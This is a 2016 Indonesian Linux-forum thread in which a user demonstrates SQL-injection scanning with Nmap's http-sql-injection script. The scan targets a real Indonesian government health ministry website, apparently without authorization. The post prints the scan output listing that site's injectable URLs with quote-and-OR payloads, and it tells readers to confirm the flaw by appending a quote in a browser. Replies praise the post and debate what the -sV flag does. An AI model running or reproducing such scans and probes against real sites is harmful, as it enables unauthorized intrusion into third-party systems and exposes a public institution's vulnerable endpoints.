NEW CONTENT RANDOM THREAD Unread Post

Scan vuln sql injection with NMAP

by teh - 03-09-2016 at 11:47 PM
teh
Junior Member
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 03-09-2016, 11:47 PM (This post was last modified: 03-10-2016, 08:14 AM by teh.)
saya mau sharing tentang mencari celah sql injection dengan script yang ada di NMAP. maaf bila ada kesalahan mohon di koreksi mastah :blush: 
command line yang saya gunakan 
Code:
nmap -sV --script=http-sql-injection www.target.com -Pn -p 80

keterangan :
-sV : untuk mendeteksi versi pada sistem operasi
--script : untuk memanggil script nmap yang akan di gunakan (untuk mencari script nmap yang lain nya ketik locate *.nse)
-Pn : untuk melewati proses identifikasi host yang sedang hidup (no ping)
-p : port yang digunakan

disini saya akan test situs http://www.depkes.go.id

Code:
tehmanis@0dayWL:~$ nmap -sV --script=http-sql-injection www.depkes.go.id -Pn -p 80

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-10 03:01 EST
Nmap scan report for www.depkes.go.id (202.70.136.4)
Host is up (0.026s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((Oracle))
|_http-server-header: Apache/2.2.15 (Oracle)
| http-sql-injection:
|   Possible sqli for queries:
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/pdf.php?id=a01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/pdf.php?id=16030500001%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider
|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider
|_    http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.95 seconds

nah ternyata pada situs tersebut terdapat vulneralbility sql injection, untuk memastikan nya kita buka browser lalu copas salah satu link vuneralbility nya
contoh :

Code:
http://www.depkes.go.id/index.php?lg=LN01

tambahkan kutip pada akhir alamat url, dan ini hasil nya.

[Image: 10qb7e1.jpg]


ini saya buat video nya juga cekidoot
semoga bermanfaat dan mohon maaf bilang banyak salah dalam thread ini :blush:
Message
Reply
Find Posts
Aiden_
From Nothing To Be Something
Moderators
Posts:
49
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#2
Posted: 03-10-2016, 12:56 AM
wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah
Message
Reply
Find Posts
teh
Junior Member
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#3
OP
Posted: 03-10-2016, 07:37 AM
(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
Message
Reply
Find Posts
Code Sec7or
Satpam
Moderators
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#4
Posted: 03-10-2016, 08:06 AM
Mantab,mas..
Ijin coba dulu dah..
Backbox Malang Team
Message
Reply
Find Posts
Aiden_
From Nothing To Be Something
Moderators
Posts:
49
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#5
Posted: 03-10-2016, 11:04 AM
(03-10-2016, 07:37 AM)teh Wrote:
(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
maaf nii ada sedikit koreksi

biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat :D

tapi mgkin ane yang salah :3
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah
Message
Reply
Find Posts
kalong404
Junior Member
Posts:
8
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#6
Posted: 03-10-2016, 11:28 AM
Lumayan ilmu nya om..
Message
Reply
Find Posts
teh
Junior Member
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#7
OP
Posted: 03-10-2016, 02:42 PM
(03-10-2016, 11:04 AM)Aiden_ Wrote:
(03-10-2016, 07:37 AM)teh Wrote:
(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
maaf nii ada sedikit koreksi

biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat :D

tapi mgkin ane yang salah :3
wah mkasih lg om :D  klo dari nmap --help fungsi -sV scanning fungsi ke database nya yaa kaya contoh di atas muncul versi DB oracle
Message
Reply
Find Posts
Aiden_
From Nothing To Be Something
Moderators
Posts:
49
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#8
Posted: 03-11-2016, 12:28 AM (This post was last modified: 03-11-2016, 12:34 AM by Aiden_.)
(03-10-2016, 02:42 PM)teh Wrote:
(03-10-2016, 11:04 AM)Aiden_ Wrote:
(03-10-2016, 07:37 AM)teh Wrote:
(03-10-2016, 12:56 AM)Aiden_ Wrote: wahh coba dalam bentuk tulisan bang :D
trus ada penjelasan di setiap paramter yang digunakan :v

mkasih saran nya om. .maaf masih awam sama forumer :3
maaf nii ada sedikit koreksi

biar lebih tepat penjelasan paramter -sV menurut yang yang juga msh belajar itu
-sv = service version scanning jadi kalau versi pada system operasi agak kurang tepat :D

tapi mgkin ane yang salah :3
wah mkasih lg om :D  klo dari nmap --help fungsi -sV scanning fungsi ke database nya yaa kaya contoh di atas muncul versi DB oracle
yaa emg bener, kan itu nama service nya apache, jadi itu di discloure versi dari service apache nya
coba kalau ente punya server, ente disable semua service yang berjalan pada port2 yang ingin di scan
kira versi nya akan keluar apa kagak :D
root@localhost:~# cat something.txt
Dompu Linuxer
I'm Nothing Without Allah
Message
Reply
Find Posts
teh
Junior Member
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#9
OP
Posted: 03-11-2016, 01:22 PM
hmm gitu yaa proses nya mkasih kang aiden nambah ilmu lg nih saya :D
Message
Reply
Find Posts
kcnewbie
Security Analyze
Super Moderators
Posts:
35
Joined:
Mar 2016
Likes:
1
Reputation:
0
2 Year Of Member
#10
Posted: 03-11-2016, 02:03 PM
wiiihh mantap
Zero-Security.id | BackBox Jakarta Team
Message
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)
Navigation
Latest News
Bugtracker
Team
Mark forum as read
Community
Banlist
Usergroups
Memberlist
Statistics
Help/Account
Help Documents and Rules
Contact
Login
Create an account
About Us
Forum Backbox Indonesia adalah salah satu media pembelajaran bagi siapa saja yang ingin belajar mengenai dunia Open Source khususnya untuk memperdalam Backbox Linux.
Posts:
971
Members:
1322
Threads:
199
Resources:
0
New :
spongebob